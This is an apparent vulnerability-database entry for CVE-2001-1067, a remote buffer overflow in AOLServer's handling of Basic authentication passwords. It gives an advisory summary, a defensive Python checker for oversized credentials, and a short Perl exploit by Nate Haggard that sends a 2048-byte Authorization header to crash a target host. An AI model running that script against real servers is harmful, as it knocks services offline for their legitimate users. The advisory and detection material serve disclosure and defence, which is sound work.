AOLServer Overlong Authentication String Remote Buffer Overflow Vulnerability

Vulnerability ID: 1106469
Vulnerability type: Unknown
Published: 2001-08-22
Updated: 2005-05-02
CVE ID: CVE-2001-1067
CNNVD-ID: CNNVD-200108-188
Platform: Unix
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/21088
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-188
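|Vulnerability details
AOLServer is America Online's free, open-source HTTP server, maintained by America Online and the open-source community. It provides Tcl interpreter support, multithreading and dynamic pages, and is suited to high-volume, dynamic web sites. AOLServer has a buffer overflow in its handling of password strings, which a remote attacker can exploit to cause a denial of service. When a remote attacker sends AOLServer a password longer than 2048 bytes, the buffer overflows, overwriting stack variables and the return address and crashing AOLServer. A remote attacker may even be able to execute arbitrary code with the privileges of the AOLServer process and gain local access.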
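A defensive check for the condition described above, written for this page as an added example (it is not code from AOLServer or from the advisory): it inspects a raw HTTP request in front of the server and flags `Authorization: Basic` credentials that reach the 2048-byte size named in the advisory or that are not a well-formed `user:password` encoding. The 512-byte policy ceiling, the finding labels and the function name are assumptions.

```python
import base64
import binascii
import re

ADVISORY_LEN = 2048  # credential size named in the advisory
POLICY_LEN = 512     # assumed local ceiling for a Basic credential; tune per site

# Header names and the scheme token are case-insensitive.
_HDR = re.compile(rb"^authorization[ \t]*:[ \t]*basic[ \t]+(\S*)[ \t]*$", re.I)

def check_basic_auth(raw_request: bytes, limit: int = POLICY_LEN) -> list[str]:
    """Return findings for the Authorization: Basic headers of one raw request."""
    head = re.split(rb"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    findings = []
    # Split on bare LF as well as CRLF: a client is not obliged to be well-formed.
    for line in re.split(rb"\r?\n", head)[1:]:
        m = _HDR.match(line)
        if not m:
            continue
        cred = m.group(1)
        if len(cred) >= ADVISORY_LEN:
            findings.append(f"oversized-credential:{len(cred)}")
        elif len(cred) > limit:
            findings.append(f"over-policy-limit:{len(cred)}")
        try:
            decoded = base64.b64decode(cred, validate=True)
        except (binascii.Error, ValueError):
            findings.append("not-base64")
            continue
        # A real Basic credential decodes to "user:password".
        if b":" not in decoded:
            findings.append("no-user-pass-separator")
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET / HTTP/1.0\r\nAuthorization: Basic "
              + base64.b64encode(b"alice:s3cret") + b"\r\n\r\n",
    "long_lf": b"GET / HTTP/1.0\nAuthorization: Basic " + b"A" * 2048 + b"\r\n\r\n",
    "garbage": b"GET / HTTP/1.0\r\nauthorization:basic  %%%\r\n\r\n",
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, check_basic_auth(req))
```

A filler string can be valid base64, so the length test and the `user:password` structure test are reported separately; either one is grounds to reject the request before it reaches the server.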
|Exploit
source: http://www.securityfocus.com/bid/3230/info

AOLServer is a freely available, open source web server. It was originally written by AOL, and is currently developed and maintained by AOL and public domain.

A problem has been discovered that can allow remote users to crash an AOLServer, denying service to legitimate users of the system. The problem is due to the handling of passwords. It is possible for a remote user to overflow a buffer within the AOLServer process by sending a password of 2048 bytes. This could result in the overwriting of stack variables, including the return address.

This makes it possible for a remote user to execute arbitrary code with the privileges of the AOLServer process, and potentially gain local access.

#!/usr/bin/perl

## Nate Haggard <nate@securitylogics.com>
## AOLserver 3.0 vulnerability
## August 22, 2001

use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host\n" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;
|References

Source: BID
Name: 3230
Link: http://www.securityfocus.com/bid/3230
Source: XF
Name: aolserver-long-password-dos(7030)
Link: http://xforce.iss.net/static/7030.php
Source: BUGTRAQ
Name: 20010822 AOLserver 3.0 vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2001-08/0325.html
Source: BUGTRAQ
Name: 20010906 AOLserver exploit code
Link: http://www.securityfocus.com/archive/1/213041